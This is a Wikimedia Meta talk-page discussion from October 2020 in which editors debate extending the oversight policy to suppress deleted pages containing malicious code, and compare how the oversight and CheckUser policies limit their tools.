Talk:Oversight policy

From Meta, a Wikimedia project coordination wiki
(Redirected from Talk:Oversight)
Jump to navigation Jump to search
Votes for deletion Several proposals have been made concerning this page. Before making a new one, please review these discussions and their results (keep, change, or no consensus).


Expand for malicious code removal[edit]

Follow up from phab:T202989. In the event that dangerous/malicious code pages are uploaded, suppression may be the best way to deal with it - suppose we should RfC this to expand the use case? — xaosflux Talk 19:23, 17 October 2020 (UTC)

  • As the one who raised this point on the Functionaries list, I'm certainly in favour of adding this. Thryduulf (talk: meta · en.wp · wikidata) 19:28, 17 October 2020 (UTC)
I don't believe that this is needed - "dangerous/malicious code pages" can simply be deleted normally if that falls within a projects deletion policy. I don't really understand how this has something to do with phab:T202989 - that task will not allow admins to run any new code, just view it. We don't oversight "dangerous/malicious code " that is added to non-code page (i.e. just displayed, and not executed) as far as I know either DannyS712 (talk) 20:50, 17 October 2020 (UTC)
@DannyS712: In which case there should be no reason why administrators should be prevented from viewing deleted .js/.css pages (which they currently cannot). This is contrary to the arguments against making the change requested at phab:T202989 where it is claimed that it is important admins should not be able to view deleted code pages as they might contain malicious or otherwise harmful code. The counter argument is that such harmful code can be hidden from administrators using suppression, which it clearly can be technically but not necessarily by policy. Thryduulf (talk: meta · en.wp · wikidata) 21:12, 17 October 2020 (UTC)
"In which case there should be no reason why administrators should be prevented from viewing deleted .js/.css pages (which they currently cannot)." - I agree, which is why I have sent a patch to restore the ability. "This is contrary to the arguments ... where it is claimed that it is important admins should not be able to view deleted code pages as they might contain malicious or otherwise harmful code." - I do not consider those arguments to be convincing DannyS712 (talk) 22:08, 17 October 2020 (UTC)
I agree that this is tangential to the phab task. MediaWiki (and suppression) is used beyond WMF servers, and our community policies shouldn't dictate the permissions structure for downstream users. The concern is that admins should not be allowed to view malicious code, and since oversight provides a technical solution to that problem the concern is obviated. Whether the end users want to implement that solution is their business. So I think these two discussions can happen in parallel without being bound to each other. That said, I agree with xaosflux that an RfC on allowing suppression of malicious code is a good idea. To avoid wasting time, we should probably figure out a list of criteria for "malicious" so that oversighters (who may not know javascript) can more easily evaluate requests. Wugapodes (talk) 22:53, 17 October 2020 (UTC)
What harm comes from being able to view "malicious" code, however that may be defined? As long as it is not being run, I don't see the problem (assuming malicious refers to code doing bad things, not code that includes text that is malicious, eg outing) DannyS712 (talk) 23:17, 17 October 2020 (UTC)
If administrators can view deleted revisions they can also copy deleted revisions, even if the page is never restored in the logs. If you can get an unwitting user to request that an unwitting admin provide a deleted script with code that does bad stuff, then the code remains a vulnerability. Currently we restrict it by default to interface administrators. The proposed solution is that we restrict it case-by-case using oversight. I think technologically it's in line with full transparency and should go ahead without delay, but the result is that we need to determine whether and how to implement it as a matter of Oversight policy on WMF wikis. Wugapodes (talk) 00:12, 19 October 2020 (UTC)
We restrict it by default to interface administrators not because the intention was to restrict it to interface administrators, but because this was an unintentional side effect of removing the ability of normal administrators to edit the scripts. If someone knows to request a copy of a deleted script that would do bad stuff, the code only remains a vulnerability if the user requesting a copy decides to run it. DannyS712 (talk) 01:41, 19 October 2020 (UTC)
I tend to agree with Danny that deletion/revision deletion is enough to hide bad code in general where needed. On the other hand, I might be persuaded to support this proposal, but only to deal with especially dangerous or damaging code (a concept to be defined which can include e.g. code that can be used to hijack other user accounts, or to violate their privacy, etc.) if only just to prevent administrators inadvertently undeleting perilous code where there is a credible fear that such code is so malicious that it needs to be restricted (if the Phabricator task gets fixed and administrators are allowed again to see deleted revisions in CSS/JS/JSON pages...). My opinion is that the proposed criterion be as specific and as narrow as possible, with just a bit of leeway for common sense, but that in no way means that Suppression is allowed to be used in all instances of bad code. Just my two cents. —MarcoAurelio (talk) 18:58, 18 October 2020 (UTC)
  • Already covered. I’ll ping Risker since she was instrumental in developing the Oversight policy, but as I said on our list, it’s important to remember that the OS policy is fairly unique amongst Wikimedia governance policies as it is intended to create a minimum standard for when suppression must/should occur. It is not an all-inclusive listing of the only times suppression can occur, because creating such a list would be impossible as its tantamount to creating a list of all the way humans can be cruel to one another. Whether or not a local oversighter wants to act in these cases is one thing, but they can if there’s general agreement on their team that content falls within the intent of the policy.

    Tl;dr: the OS policy is the opposite of the CU policy. The latter lists the only circumstances where an action can occur, while this lists the minimum circumstances where it should occur. TonyBallioni (talk) 23:01, 18 October 2020 (UTC)

    That may be your personal interpretation, but I believe it is incorrect. Both the CU and OS policies establish the general conditions under which both tools can be used, while allowing for judgement to be exercised by functionaries in determining whether actions will fall under a given criteria established in the policy. They do not work opposite to each-other. I will also say in my capacity as an ombuds that we have recommended that the Foundation work with the community to modernize the oversight policy to allow for some different local practices, and provide for greater clarity of the criteria for suppression. – Ajraddatz (talk) 23:47, 18 October 2020 (UTC)
    They don’t work opposite each other as their intent is the same: to protect privacy. How they do that though is in fact in an opposite manner: local communities cannot create a looser CheckUser policy than the global one. They can create a more liberal local oversight policy than the global one, however. There’s also the routine use of suppression on projects for things not explicitly covered in the wording: self-disclosures of personal information by adults early in their time on Wikimedia projects if they later regret it probably being the most prominent as that’s pretty clearly not covered by the wording (see “who have not made their identity public”.)

    The same could be said for suppression of information about minors that they self-disclose. That ones trickier because of the age consideration, but it’s not unambiguously covered by either the global policy or to my knowledge any local one, but many (not all) projects do it anyway. We also suppress renames in very rare circumstances involving real life harassment, suppress user details people have self-revealed if there’s a credible fear of harm, and many other things that don’t fall strictly within the wording of any global or local OS policy, but are clearly within the intent of protecting people by limiting access to their data. You could say all of these are ignore all rules types of moves, but even if that’s the case, it’s evidence the OS policy in practice is not applied strictly

    The wording of the policies around abuse is also significant: the CU policy foresees use of the tool itself as a potential abuse, while the OS policy is primarily concerned about release of private data in that regard. It is certainly possible to abuse OS by using it and the policy wording acknowledges this, but the bigger risk is the read access which can directly impact the privacy policy. We shouldn’t be suppressing for just anything, but a lot of the work is in the grey area that’s not clearly addressed. I pinged Risker on this because she and I have had a fair amount of discussions on it and she eventually won me over to a more liberal interpretation, and I think her input here would be valuable. She can correct me if I’ve overstated anything, but I don’t think a strict reading of the OS policy matches either it’s implementation or the sections of it where it discusses what abuse is. TonyBallioni (talk) 04:47, 19 October 2020 (UTC)

    Acknowledging this ping, but not able to respond tonight. Will do so tomorrow. Thank you for looking in to this. I will note, however, that anything that involves malicious code is strictly against the TOU. Risker (talk) 05:52, 19 October 2020 (UTC)
    I agree that the policy should work the way you described. I don't think it currently does, and I think you should be caveating what you say with "in my opinion" rather than stating it as fact, because I would argue that it is not. I would personally interpret the enwiki practice of suppressing self disclosures by minors as against the current policy, though I am not suggesting that the practice be stopped. – Ajraddatz (talk) 15:40, 19 October 2020 (UTC)